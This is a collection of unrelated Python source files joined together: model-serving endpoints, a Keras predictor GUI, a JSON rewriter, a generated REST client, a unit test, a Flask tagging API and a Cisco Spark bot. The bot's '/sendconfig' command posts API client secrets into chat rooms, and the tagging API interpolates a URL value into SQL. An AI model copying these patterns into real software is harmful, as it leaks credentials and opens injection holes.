def setup(my_config):
'''Initialize the global variables'''
global inference_fn, pre, post, logger, config
config = deepcopy(my_config)
# Make log directory if it doesn't exist
my_logdir = config["logdir"]
if not os.path.isdir(my_logdir):
os.mkdir(my_logdir)
# Init logger
logger = Logger(os.path.join(my_logdir, "logfile"))
# Init inference_fn
model = config["model"]
if config["inference_fn"] is not None:
inference_fn = getattr(model, config["inference_fn"])
else:
inference_fn = model
# Init preprocessing and postprocessing functions
my_pre = config["pre"]
my_post = config["post"]
if my_pre:
if isinstance(my_pre, Sequence):
pre = list(my_pre)
else:
pre = [my_pre]
if my_post:
if isinstance(my_post, Sequence):
post = list(my_post)
else:
post = [my_post]
def run_model(inp):
# Apply all preprocessing functions
for f in pre:
inp = f(inp)
# Pass input through model
output = inference_fn(inp)
# Apply all postprocessing functions
for f in post:
output = f(output)
# If torch tensor or numpy array, transform to list so we can pass it back
if isinstance(output, (np.ndarray, torch.Tensor)):
output = output.tolist()
return output
@app.get("/")
def root():
# For testing/debugging
return {"text": "Hello World!"}
@app.post("/predict")
def predict(model_input: ModelInput, request: Request):
'''
View function handling the main /predict endpoint
Input: Expect to receive an application/json body. The value of the "inputs" field
will be used as the input that will be passed to the model
and should be a list or a dict.
Output: The output of the model after being run through the postprocessing
functions.
'''
inp = model_input.inputs
# Logging
client_host = request.client.host
logger.log(f'[{datetime.now()}] Received input of size {sys.getsizeof(inp)} from {client_host}')
output = run_model(inp)
return {"output": output}
@app.get("/predict_image")
def upload_image(request: Request):
return templates.TemplateResponse("upload.html", {"request": request})
@app.post("/predict_image")
def predict_image(request: Request, file: UploadFile = File(...)):
'''
View function handling the /predict_image endpoint
Input: Expect to receive a body. The value of the "inputs" field
will be used as the input that will be passed to the model
and should be a list or a dict.
Output: The output of the model after being run through the postprocessing
functions.
'''
inp = Image.open(file.file)
# Logging
client_host = request.client.host
logger.log(f'[{datetime.now()}] Received input of size {sys.getsizeof(inp)} from {client_host}')
output = run_model(inp)
return {"output": output}
|
# Unsure majority of time but more correct then wrong when thinking of
# Requires more data for training
from data import *
from tkinter import *
from keras.models import load_model
import numpy as np
import threading
import time
# Time variables
start_wait = 10000
wait = 2100
# Set dimensions
w = 900
h = 556
root = Tk()
root.geometry(str(w)+'x'+str(h))
root.title('Predictor')
graphing_area = Canvas(root, width=w, height=h)
graphing_area.pack()
# Import model to be used
saved_model = load_model('model.h5')
# Begin data thread
thread = threading.Thread(target=data_loop, args=[False, False, False, 1, False])
thread.start()
# Predicts the input values and returns predicted letter
def predict(values, model):
processed_data = np.expand_dims(np.array([np.abs(np.fft.rfft(np.array(values)))/85000]), 3)
prediction = model.predict(processed_data)
print(prediction[0][0])
if prediction[0][0] < 0.1:
return 'B'
elif prediction[0][0] > 0.9:
return 'A'
else:
return '?'
def display_prediction(canvas, frame, model):
prediction = predict(last_values[-1500:], model)
canvas.delete('all')
canvas.create_text(w / 2, h / 2, font="Arial " + str(int(round(h / 3, 0))), text='Collecting...', anchor='center')
time.sleep(1)
canvas.delete('all')
canvas.create_text(w / 2, h / 2, font="Arial " + str(int(round(h / 3, 0))), text=prediction, anchor='center')
root.after(wait, display_prediction, canvas, frame, model)
root.after(start_wait, display_prediction, graphing_area, root, saved_model)
root.mainloop()
|
import json
from Function.Symbol_ReplaceController import *
from Function.Position_strController import *
from Function.initdate_ReplaceController import *
from Function.Date_ReplaceController import *
from JsonReplace import JsonReplace
def get_new_json(file_path):
# 打开json文件
file = open(file_path, encoding='gbk')
json_to_python = json.load(file, strict=False)
# 判断json文件格式
if 'data' in json_to_python: # Json文件中只有一个data的文件格式
return json_to_python
elif "rows" not in json_to_python: # 说明是list格式的
# 对Json文件中可能本身value就是"-"的场景作处理,参数置为1即开启
if int(JsonReplace().symbol_para) == 1:
json_to_python = Symbol_ReplaceController(json_to_python, file_path)
# 对文件中包含当前日期的position_str作替换
json_to_python = Position_strController(json_to_python)
# 对Json文件中init_date作处理
json_to_python = initdate_ReplaceController(json_to_python)
# 对Json文件中指定date作处理
for key in JsonReplace().date_key:
date_value = JsonReplace().config.get("DATE", key)
for value in date_value.split(','):
json_to_python = Date_ReplaceController(json_to_python, value)
return json_to_python
else: # 说明是dict格式的
json_to_python_rows = json_to_python['rows'] # 导致写入JSON文件后丢失字段的罪魁祸首
# 对Json文件中可能本身value就是"-"的场景作处理,参数置为1即开启
if int(JsonReplace().symbol_para) == 1:
json_to_python_rows = Symbol_ReplaceController(json_to_python_rows, file_path)
# 对文件中包含当前日期的position_str作替换
json_to_python_rows = Position_strController(json_to_python_rows)
# 对Json文件中init_date作处理
json_to_python_rows = initdate_ReplaceController(json_to_python_rows)
# 对Json文件中指定date作处理
for key in JsonReplace().date_key:
date_value = JsonReplace().config.get("DATE", key)
for value in date_value.split(','):
json_to_python_rows = Date_ReplaceController(json_to_python_rows, value)
json_to_python['rows'] = json_to_python_rows
return json_to_python
def rewrite_json_file(file_path, json_data):
with open(file_path, 'w') as f:
json.dump(json_data, f, indent=4, ensure_ascii=False)
f.close()
|
"""
Documents Distributor - CallStreet Events
CallStreet Events contains all the Documents Distributor APIs that provide events data such as Events Audio and Near Real-Time Transcripts The Events Audio API provides access to all audio recordings to various company events covered by FactSet. The events include, but are not limited to: earnings calls, conferences, and investor days. This API also provides relevant metadata such as timestamps and identifiers around each audio file. The Documents Distributor - Near Real-time Transcripts API enables access to Near Real-time Transcripts provided by CallStreet to time-sensitive clients. This API also provides the relevant speaker metadata along with their confidence scores. This data caters to quant clients interested in building machine learning models. Clients can leverage this API to perform sentiment analysis through natural language processing or machine learning. It can also be used to complement analysis using FactSet's transcripts service. # noqa: E501
The version of the OpenAPI document: 3.0.0
Generated by: https://openapi-generator.tech
"""
import io
import json
import logging
import re
import ssl
from urllib.parse import urlencode
from urllib.parse import urlparse
from urllib.request import proxy_bypass_environment
import urllib3
import ipaddress
from fds.sdk.DocumentsDistributorCallStreetEvents.exceptions import ApiException, UnauthorizedException, ForbiddenException, NotFoundException, ServiceException, ApiValueError
logger = logging.getLogger(__name__)
class RESTResponse(io.IOBase):
def __init__(self, resp):
self.urllib3_response = resp
self.status = resp.status
self.reason = resp.reason
self.data = resp.data
def getheaders(self):
"""Returns a dictionary of the response headers."""
return self.urllib3_response.getheaders()
def getheader(self, name, default=None):
"""Returns a given response header."""
return self.urllib3_response.getheader(name, default)
class RESTClientObject(object):
def __init__(self, configuration, pools_size=4, maxsize=None):
# urllib3.PoolManager will pass all kw parameters to connectionpool
# https://github.com/shazow/urllib3/blob/f9409436f83aeb79fbaf090181cd81b784f1b8ce/urllib3/poolmanager.py#L75 # noqa: E501
# https://github.com/shazow/urllib3/blob/f9409436f83aeb79fbaf090181cd81b784f1b8ce/urllib3/connectionpool.py#L680 # noqa: E501
# maxsize is the number of requests to host that are allowed in parallel # noqa: E501
# Custom SSL certificates and client certificates: http://urllib3.readthedocs.io/en/latest/advanced-usage.html # noqa: E501
# cert_reqs
if configuration.verify_ssl:
cert_reqs = ssl.CERT_REQUIRED
else:
cert_reqs = ssl.CERT_NONE
addition_pool_args = {}
if configuration.assert_hostname is not None:
addition_pool_args['assert_hostname'] = configuration.assert_hostname # noqa: E501
if configuration.retries is not None:
addition_pool_args['retries'] = configuration.retries
if configuration.socket_options is not None:
addition_pool_args['socket_options'] = configuration.socket_options
if maxsize is None:
if configuration.connection_pool_maxsize is not None:
maxsize = configuration.connection_pool_maxsize
else:
maxsize = 4
# https pool manager
if configuration.proxy and not should_bypass_proxies(configuration.host, no_proxy=configuration.no_proxy or ''):
self.pool_manager = urllib3.ProxyManager(
num_pools=pools_size,
maxsize=maxsize,
cert_reqs=cert_reqs,
ca_certs=configuration.ssl_ca_cert,
cert_file=configuration.cert_file,
key_file=configuration.key_file,
proxy_url=configuration.proxy,
proxy_headers=configuration.proxy_headers,
**addition_pool_args
)
else:
self.pool_manager = urllib3.PoolManager(
num_pools=pools_size,
maxsize=maxsize,
cert_reqs=cert_reqs,
ca_certs=configuration.ssl_ca_cert,
cert_file=configuration.cert_file,
key_file=configuration.key_file,
**addition_pool_args
)
def request(self, method, url, query_params=None, headers=None,
body=None, post_params=None, _preload_content=True,
_request_timeout=None):
"""Perform requests.
:param method: http request method
:param url: http request url
:param query_params: query parameters in the url
:param headers: http request headers
:param body: request json body, for `application/json`
:param post_params: request post parameters,
`application/x-www-form-urlencoded`
and `multipart/form-data`
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
"""
method = method.upper()
assert method in ['GET', 'HEAD', 'DELETE', 'POST', 'PUT',
'PATCH', 'OPTIONS']
if post_params and body:
raise ApiValueError(
"body parameter cannot be used with post_params parameter."
)
post_params = post_params or {}
headers = headers or {}
timeout = None
if _request_timeout:
if isinstance(_request_timeout, (int, float)): # noqa: E501,F821
timeout = urllib3.Timeout(total=_request_timeout)
elif (isinstance(_request_timeout, tuple) and
len(_request_timeout) == 2):
timeout = urllib3.Timeout(
connect=_request_timeout[0], read=_request_timeout[1])
try:
# For `POST`, `PUT`, `PATCH`, `OPTIONS`, `DELETE`
if method in ['POST', 'PUT', 'PATCH', 'OPTIONS', 'DELETE']:
# Only set a default Content-Type for POST, PUT, PATCH and OPTIONS requests
if (method != 'DELETE') and ('Content-Type' not in headers):
headers['Content-Type'] = 'application/json'
if query_params:
url += '?' + urlencode(query_params)
if ('Content-Type' not in headers) or (re.search('json', headers['Content-Type'], re.IGNORECASE)):
request_body = None
if body is not None:
request_body = json.dumps(body)
r = self.pool_manager.request(
method, url,
body=request_body,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
elif headers['Content-Type'] == 'application/x-www-form-urlencoded': # noqa: E501
r = self.pool_manager.request(
method, url,
fields=post_params,
encode_multipart=False,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
elif headers['Content-Type'] == 'multipart/form-data':
# must del headers['Content-Type'], or the correct
# Content-Type which generated by urllib3 will be
# overwritten.
del headers['Content-Type']
r = self.pool_manager.request(
method, url,
fields=post_params,
encode_multipart=True,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
# Pass a `string` parameter directly in the body to support
# other content types than Json when `body` argument is
# provided in serialized form
elif isinstance(body, str) or isinstance(body, bytes):
request_body = body
r = self.pool_manager.request(
method, url,
body=request_body,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
else:
# Cannot generate the request from given parameters
msg = """Cannot prepare a request message for provided
arguments. Please check that your arguments match
declared content type."""
raise ApiException(status=0, reason=msg)
# For `GET`, `HEAD`
else:
r = self.pool_manager.request(method, url,
fields=query_params,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
except urllib3.exceptions.SSLError as e:
msg = "{0}\n{1}".format(type(e).__name__, str(e))
raise ApiException(status=0, reason=msg)
if _preload_content:
r = RESTResponse(r)
# log response body
logger.debug("response body: %s", r.data)
if not 200 <= r.status <= 299:
if r.status == 401:
raise UnauthorizedException(http_resp=r)
if r.status == 403:
raise ForbiddenException(http_resp=r)
if r.status == 404:
raise NotFoundException(http_resp=r)
if 500 <= r.status <= 599:
raise ServiceException(http_resp=r)
raise ApiException(http_resp=r)
return r
def GET(self, url, headers=None, query_params=None, _preload_content=True,
_request_timeout=None):
return self.request("GET", url,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
query_params=query_params)
def HEAD(self, url, headers=None, query_params=None, _preload_content=True,
_request_timeout=None):
return self.request("HEAD", url,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
query_params=query_params)
def OPTIONS(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("OPTIONS", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def DELETE(self, url, headers=None, query_params=None, body=None,
_preload_content=True, _request_timeout=None):
return self.request("DELETE", url,
headers=headers,
query_params=query_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def POST(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("POST", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def PUT(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("PUT", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def PATCH(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("PATCH", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
# end of class RESTClientObject
def is_ipv4(target):
""" Test if IPv4 address or not
"""
try:
chk = ipaddress.IPv4Address(target)
return True
except ipaddress.AddressValueError:
return False
def in_ipv4net(target, net):
""" Test if target belongs to given IPv4 network
"""
try:
nw = ipaddress.IPv4Network(net)
ip = ipaddress.IPv4Address(target)
if ip in nw:
return True
return False
except ipaddress.AddressValueError:
return False
except ipaddress.NetmaskValueError:
return False
def should_bypass_proxies(url, no_proxy=None):
""" Yet another requests.should_bypass_proxies
Test if proxies should not be used for a particular url.
"""
parsed = urlparse(url)
# special cases
if parsed.hostname in [None, '']:
return True
# special cases
if no_proxy in [None , '']:
return False
if no_proxy == '*':
return True
no_proxy = no_proxy.lower().replace(' ','');
entries = (
host for host in no_proxy.split(',') if host
)
if is_ipv4(parsed.hostname):
for item in entries:
if in_ipv4net(parsed.hostname, item):
return True
return proxy_bypass_environment(parsed.hostname, {'no': no_proxy} )
|
from dowel import logger
import numpy as np
from garage.sampler.utils import truncate_paths
from tests.fixtures.logger import NullOutput
class TestSampler:
def setup_method(self):
logger.add_output(NullOutput())
def teardown_method(self):
logger.remove_all()
def test_truncate_paths(self):
paths = [
dict(
observations=np.zeros((100, 1)),
actions=np.zeros((100, 1)),
rewards=np.zeros(100),
env_infos=dict(),
agent_infos=dict(lala=np.zeros(100)),
),
dict(
observations=np.zeros((50, 1)),
actions=np.zeros((50, 1)),
rewards=np.zeros(50),
env_infos=dict(),
agent_infos=dict(lala=np.zeros(50)),
),
]
truncated = truncate_paths(paths, 130)
assert len(truncated) == 2
assert len(truncated[-1]['observations']) == 30
assert len(truncated[0]['observations']) == 100
# make sure not to change the original one
assert len(paths) == 2
assert len(paths[-1]['observations']) == 50
|
import flask
import itertools
from . import tag_validation
from .entities import Entity, entities_blueprint
from ..api import AlmacenAPI, api
from datetime import datetime
from data_layer import Redshift as SQL
from typing import List, Dict, Optional
from subir import Tagger
time_format = '%Y-%m-%d %H:%M:%S'
tags_blueprint = flask.Blueprint('tags', __name__, url_prefix='/companies/<identifier>/entities/<entity_type>/tags')
# DEPRECATED
# TODO remove this when longcat_ux is updated
def tag_entities_query(company_identifier: str, entity: Entity, entity_array: List[Dict[str, any]], tag: str, subtag: Optional[str]=None) -> SQL.Query:
upload_group = 'almacen_api {date}'.format(date=datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S'))
rows = [[company_identifier, c['app'], c['channel'], str(c[entity.id_column_name]), tag, subtag, upload_group] for c in entity_array]
format_rows = ',\n'.join([SQL.Query.format_array(r) for r in rows])
merge_query = SQL.MergeQuery(
join_columns=['channel', entity.id_column_name],
update_columns=[*entity.tag_column_names, 'upload_group'],
source_table=entity.temp_tag_table_name,
target_table=entity.target_tag_table_name,
source_schema=None,
target_schema=company_identifier
)
return SQL.Query(f'''
create temp table {entity.temp_tag_table_name} (like {company_identifier}.{entity.target_tag_table_name});
insert into {entity.temp_tag_table_name} (company_identifier, app, channel, {entity.id_column_name}, {','.join(entity.tag_column_names)}, upload_group)
values {format_rows};
{merge_query.query};
drop table {entity.temp_tag_table_name};
''',
substitution_parameters=tuple(itertools.chain.from_iterable(rows)) + merge_query.substitution_parameters
)
def subtag_entities_query(company_identifier: str, entity: Entity, entity_array: List[Dict[str, any]], subtag: str) -> SQL.Query:
upload_group = 'almacen_api {date}'.format(date=datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S'))
rows = [[company_identifier, c['app'], c['channel'], str(c[entity.id_column_name]), subtag, upload_group] for c in entity_array]
format_rows = ',\n'.join([SQL.Query.format_array(r) for r in rows])
merge_query = SQL.MergeQuery(
join_columns=['channel', entity.id_column_name],
update_columns=[entity.subtag_column_name, 'upload_group'],
source_table=entity.temp_tag_table_name,
target_table=entity.target_tag_table_name,
source_schema=None,
target_schema=company_identifier
)
return SQL.Query(f'''
create temp table {entity.temp_tag_table_name} (like {company_identifier}.{entity.target_tag_table_name});
insert into {entity.temp_tag_table_name} (company_identifier, app, channel, {entity.id_column_name}, {entity.subtag_column_name}, upload_group)
values {format_rows};
{merge_query.query};
drop table {entity.temp_tag_table_name};
''',
substitution_parameters=tuple(itertools.chain.from_iterable(rows)) + merge_query.substitution_parameters
)
def primary_tag_entities_query(company_identifier: str, entity: Entity, entity_array: List[Dict[str, any]], tag: str) -> SQL.Query:
upload_group = 'almacen_api {date}'.format(date=datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S'))
rows = [[company_identifier, c['app'], c['channel'], str(c[entity.id_column_name]), tag, upload_group] for c in entity_array]
format_rows = ',\n'.join([SQL.Query.format_array(r) for r in rows])
merge_query = SQL.MergeQuery(
join_columns=['channel', entity.id_column_name],
update_columns=[entity.primary_tag_column_name, 'upload_group'],
source_table=entity.temp_tag_table_name,
target_table=entity.target_tag_table_name,
source_schema=None,
target_schema=company_identifier
)
return SQL.Query(f'''
create temp table {entity.temp_tag_table_name} (like {company_identifier}.{entity.target_tag_table_name});
insert into {entity.temp_tag_table_name} (company_identifier, app, channel, {entity.id_column_name}, {entity.primary_tag_column_name}, upload_group)
values {format_rows};
{merge_query.query};
drop table {entity.temp_tag_table_name};
''',
substitution_parameters=tuple(itertools.chain.from_iterable(rows)) + merge_query.substitution_parameters
)
def delete_tag_entities_query(company_identifier: str, entity: Entity, entities_array: List[Dict[str, any]]) -> SQL.Query:
rows = [[c['channel'], str(c[entity.id_column_name])] for c in entities_array]
formatted_rows = ',\n'.join([SQL.Query.format_array(r) for r in rows])
return SQL.Query(f'''
delete from {company_identifier}.{entity.target_tag_table_name}
where (channel, {entity.id_column_name}) in ({formatted_rows});
''',
substitution_parameters=tuple(itertools.chain.from_iterable(rows))
)
def update_cube_entity_tags_query(company_identifier: str, entity: Entity) -> SQL.Query:
return SQL.Query(f'''
begin transaction;
update {company_identifier}.performance_cube_filtered
set {', '.join(f'{c} = null' for c in entity.tag_column_names)};
update {company_identifier}.performance_cube_filtered
set {', '.join(f'{c} = t.{c}' for c in entity.tag_column_names)}
from {company_identifier}.{entity.target_tag_table_name} as t
where {company_identifier}.performance_cube_filtered.channel = t.channel
and {company_identifier}.performance_cube_filtered.{entity.id_column_name} = t.{entity.id_column_name};
end transaction;
'''
)
# DEPRECATED
# TODO remove this when longcat_ux is updated
@tags_blueprint.route('', methods=['PATCH'])
@api.check_privileges([AlmacenAPI.Privilege.tagger])
def tag_entities(identifier, entity_type):
try:
entity = Entity.from_plural(entity_type)
except ValueError as error:
raise AlmacenAPI.Error(code=400, message='Unsupported entity type.', error=error)
body = api.valid_body_from_request(
request=flask.request,
schema=tag_validation.patch_schema(entity)
)
query = tag_entities_query(
company_identifier=identifier,
entity=entity,
entity_array=body[entity.plural],
tag=body['tag'],
subtag=body['subtag'] if 'subtag' in body else None
)
return api.run_query(query)
@tags_blueprint.route('/primary', methods=['PATCH'])
@api.check_privileges([AlmacenAPI.Privilege.tagger])
def primary_tag_entities(identifier, entity_type):
try:
entity = Entity.from_plural(entity_type)
except ValueError as error:
raise AlmacenAPI.Error(code=400, message='Unsupported entity type.', error=error)
body = api.valid_body_from_request(
request=flask.request,
schema=tag_validation.patch_primary_tag_schema(entity)
)
query = primary_tag_entities_query(
company_identifier=identifier,
entity=entity,
entity_array=body[entity.plural],
tag=body['tag'],
)
return api.run_query(query)
@tags_blueprint.route('/subtag', methods=['PATCH'])
@api.check_privileges([AlmacenAPI.Privilege.tagger])
def subtag_entities(identifier, entity_type):
try:
entity = Entity.from_plural(entity_type)
except ValueError as error:
raise AlmacenAPI.Error(code=400, message='Unsupported entity type.', error=error)
body = api.valid_body_from_request(
request=flask.request,
schema=tag_validation.patch_subtag_schema(entity)
)
query = subtag_entities_query(
company_identifier=identifier,
entity=entity,
entity_array=body[entity.plural],
subtag=body['subtag']
)
return api.run_query(query)
@tags_blueprint.route('/delete', methods=['PATCH'])
@api.check_privileges([AlmacenAPI.Privilege.tagger])
def delete_tags(identifier, entity_type):
try:
entity = Entity.from_plural(entity_type)
except ValueError as error:
raise AlmacenAPI.Error(code=400, message='Unsupported entity type.', error=error)
body = api.valid_body_from_request(
request=flask.request,
schema=tag_validation.delete_schema(entity)
)
query = delete_tag_entities_query(
company_identifier=identifier,
entity=entity,
entities_array=body[entity.plural]
)
return api.run_query(query)
@tags_blueprint.route('/csv/merge', methods=['PATCH'])
@api.check_privileges([AlmacenAPI.Privilege.tagger])
def merge_tags_csv(identifier: str, entity_type: str):
try:
entity = Entity.from_plural(entity_type)
except ValueError as error:
raise AlmacenAPI.Error(code=400, message='Unsupported entity type.', error=error)
file = api.get_file(key='csv_file')
tagger = Tagger()
applied_count = tagger.apply_tags(
schema_name=identifier,
entity_name=entity.value,
should_drop=False,
should_purge=True,
csv_stream=file,
file_name=file.filename
)
return flask.jsonify({
'success': applied_count > 0,
'message': f'{applied_count} tags applied.',
})
@tags_blueprint.route('/update/cube', methods=['PATCH'])
@api.check_privileges([AlmacenAPI.Privilege.tagger])
def update_cube(identifier, entity_type):
try:
entity = Entity.from_plural(entity_type)
except ValueError as error:
raise AlmacenAPI.Error(code=400, message='Unsupported entity type.', error=error)
query = update_cube_entity_tags_query(
company_identifier=identifier,
entity=entity
)
return api.run_query(query)
|
#! /usr/bin/python
"""
boilerplate_sparkbot
This is a sample boilerplate application that provides the framework to quickly
build and deploy an interactive Spark Bot.
There are different strategies for building a Spark Bot. You can either create
a new dedicated Spark Account for the bot, or create an "Bot Account" underneath
another Spark Account. Either type will work with this boilerplate, just be sure
to provide the correct token and email account in the configuration.
This Bot will use a provided Spark Account (identified by the Developer Token)
and create a webhook to receive all messages sent to the account. You will
specify a set of command words that the Bot will "listen" for. Any other message
sent to the bot will result in the help message being sent back.
The bot is designed to be deployed as a Docker Container, and can run on any
platform supporting Docker Containers. Mantl.io is one example of a platform
that can be used to run the bot.
There are several pieces of information needed to run this application. These
details can be provided as Environment Variables to the application. The Spark
token and email address can alternatively be provided/updated via an POST request to /config.
If you are running the python application directly, you can set them like this:
# Details on the Cisco Spark Account to Use
export SPARK_BOT_EMAIL=myhero.demo@domain.com
export SPARK_BOT_TOKEN=adfiafdadfadfaij12321kaf
# Public Address and Name for the Spark Bot Application
export SPARK_BOT_URL=http://myhero-spark.mantl.domain.com
export SPARK_BOT_APP_NAME="imapex bot"
If you are running the bot within a docker container, they would be set like this:
# ToDo - Add docker run command
docker run -it --name sparkbot \
-e "SPARK_BOT_EMAIL=myhero.demo@domain.com" \
-e "SPARK_BOT_TOKEN=adfiafdadfadfaij12321kaf" \
-e "SPARK_BOT_URL=http://myhero-spark.mantl.domain.com" \
-e "SPARK_BOT_APP_NAME='imapex bot'" \
sparkbot
# ToDo - API call for configuring the Spark info
In cases where storing the Spark Email and Token as Environment Variables could
be a security risk, you can alternatively set them via a REST request.
curl -X POST http://localhost:5000/config \
-d "{\"SPARK_BOT_TOKEN\": \"<TOKEN>\", \"SPARK_BOT_EMAIL\": \"<EMAIL>"}"
You can read the configuration details with this request
curl http://localhost:5000/config
"""
from flask import Flask, request
from ciscosparkapi import CiscoSparkAPI
import os
import sys
import json
from ccw.ccwparser import *
from ccw.ccwquery import *
# Create the Flask application that provides the bot foundation
app = Flask(__name__)
# The list of commands the bot listens for
# Each key in the dictionary is a command
# The value is the help message sent for the command
commands = {
"/echo": "Reply back with the same message sent.",
"/showconfig": "Shows current configuration.",
"/help": "Get help."
}
# Not strictly needed for most bots, but this allows for requests to be sent
# to the bot from other web sites. "CORS" Requests
@app.after_request
def after_request(response):
response.headers.add('Access-Control-Allow-Origin', '*')
response.headers.add('Access-Control-Allow-Headers',
'Content-Type,Authorization,Key')
response.headers.add('Access-Control-Allow-Methods',
'GET,PUT,POST,DELETE,OPTIONS')
return response
# Entry point for Spark Webhooks
@app.route('/', methods=["POST"])
def process_webhook():
# Check if the Spark connection has been made
if spark is None:
sys.stderr.write("Bot not ready. \n")
return "Spark Bot not ready. "
post_data = request.get_json(force=True)
# Uncomment to debug
# sys.stderr.write("Webhook content:" + "\n")
# sys.stderr.write(str(post_data) + "\n")
# Take the posted data and send to the processing function
process_incoming_message(post_data)
return ""
# Config Endpoint to set Spark Details
@app.route('/config', methods=["GET", "POST"])
def config_bot():
if request.method == "POST":
post_data = request.get_json(force=True)
# Verify that a token and email were both provided
if "SPARK_BOT_TOKEN" not in post_data.keys() or "SPARK_BOT_EMAIL" not in post_data.keys():
return "Error: POST Requires both 'SPARK_BOT_TOKEN' and 'SPARK_BOT_EMAIL' to be provided."
# Setup Spark
spark_setup(post_data["SPARK_BOT_EMAIL"], post_data["SPARK_BOT_TOKEN"])
# Return the config detail to API requests
config_data = {
"SPARK_BOT_EMAIL": bot_email,
"SPARK_BOT_TOKEN": spark_token,
"SPARK_BOT_URL": bot_url,
"SPARKBOT_APP_NAME": bot_app_name
}
config_data["SPARK_BOT_TOKEN"] = "REDACTED" # Used to hide the token from requests.
return json.dumps(config_data)
# Quick REST API to have bot send a message to a user
@app.route("/hello/<email>", methods=["GET"])
def message_email(email):
"""
Kickoff a 1 on 1 chat with a given email
:param email:
:return:
"""
# Check if the Spark connection has been made
if spark is None:
sys.stderr.write("Bot not ready. \n")
return "Spark Bot not ready. "
# send_message_to_email(email, "Hello!")
spark.messages.create(toPersonEmail=email, markdown="Hello!")
return "Message sent to " + email
# Health Check
@app.route("/health", methods=["GET"])
def health_check():
"""
Notify if bot is up
:return:
"""
return "Up and healthy"
# Function to Setup the WebHook for the bot
def setup_webhook(name, targeturl):
# Get a list of current webhooks
webhooks = spark.webhooks.list()
# Look for a Webhook for this bot_name
# Need try block because if there are NO webhooks it throws an error
try:
for h in webhooks: # Efficiently iterates through returned objects
if h.name == name:
sys.stderr.write("Found existing webhook. Updating it.\n")
wh = spark.webhooks.update(webhookId=h.id, name=name, targetUrl=targeturl)
# Stop searching
break
# If there wasn't a Webhook found
if wh is None:
sys.stderr.write("Creating new webhook.\n")
wh = spark.webhooks.create(name=name, targetUrl=targeturl, resource="messages", event="created")
except:
sys.stderr.write("Creating new webhook.\n")
wh = spark.webhooks.create(name=name, targetUrl=targeturl, resource="messages", event="created")
return wh
# Function to take action on incoming message
def process_incoming_message(post_data):
# Determine the Spark Room to send reply to
room_id = post_data["data"]["roomId"]
# Get the details about the message that was sent.
message_id = post_data["data"]["id"]
message = spark.messages.get(message_id)
# Uncomment to debug
# sys.stderr.write("Message content:" + "\n")
# sys.stderr.write(str(message) + "\n")
# First make sure not processing a message from the bot
if message.personEmail in spark.people.me().emails:
# Uncomment to debug
# sys.stderr.write("Message from bot recieved." + "\n")
return ""
# Log details on message
sys.stderr.write("Message from: " + message.personEmail + "\n")
# Find the command that was sent, if any
command = ""
for c in commands.items():
if message.text.find(c[0]) != -1:
command = c[0]
sys.stderr.write("Found command: " + command + "\n")
# If a command was found, stop looking for others
break
reply = ""
# Take action based on command
# If no command found, send help
if command in ["", "/help"]:
reply = send_help(post_data)
elif command in ["/sendconfig"]:
reply = send_config(post_data)
elif command in ["/echo"]:
reply = send_echo(message)
# send_message_to_room(room_id, reply)
spark.messages.create(roomId=room_id, markdown=reply)
# Sample command function that just echos back the sent message
def send_echo(incoming):
# Get sent message
message = extract_message("/echo", incoming.text)
return message
# Construct a help message for users.
def send_help(post_data):
message = "Hello! "
message = message + "I understand the following commands: \n"
for c in commands.items():
message = message + "* **%s**: %s \n" % (c[0], c[1])
return message
# Send Configuration.
def send_config(post_data):
message = "Hello! "
message = message + "Current Configuration is: \n"
message = message + "API Client ID: "+os.environ.get("CLIENT_ID") + "\n"
message = message + "API Client Secret: "+os.environ.get("CLIENT_SECRET") + "\n"
message = message + "CEC Username: "+os.environ.get("CEC_USERID") + "\n"
return message
# Return contents following a given command
def extract_message(command, text):
cmd_loc = text.find(command)
message = text[cmd_loc + len(command):]
return message
# Setup the Spark connection and WebHook
def spark_setup(email, token):
# Update the global variables for config details
globals()["spark_token"] = token
globals()["bot_email"] = email
sys.stderr.write("Spark Bot Email: " + bot_email + "\n")
sys.stderr.write("Spark Token: REDACTED\n")
# Setup the Spark Connection
globals()["spark"] = CiscoSparkAPI(access_token=globals()["spark_token"])
globals()["webhook"] = setup_webhook(globals()["bot_app_name"], globals()["bot_url"])
sys.stderr.write("Configuring Webhook. \n")
sys.stderr.write("Webhook ID: " + globals()["webhook"].id + "\n")
if __name__ == '__main__':
# Entry point for bot
# Retrieve needed details from environment for the bot
bot_email = os.getenv("SPARK_BOT_EMAIL")
spark_token = os.getenv("SPARK_BOT_TOKEN")
bot_url = os.getenv("SPARK_BOT_URL")
bot_app_name = os.getenv("SPARK_BOT_APP_NAME")
client_id = os.getenv("CLIENT_ID")
client_secret = os.getenv("CLIENT_SECRET")
cec_username = os.getenv("CEC_USERID")
cec_password = os.getenv("CEC_PASSWORD")
# bot_url and bot_app_name must come in from Environment Variables
if bot_url is None or bot_app_name is None:
sys.exit("Missing required argument. Must set 'SPARK_BOT_URL' and 'SPARK_BOT_APP_NAME' in ENV.")
# Write the details out to the console
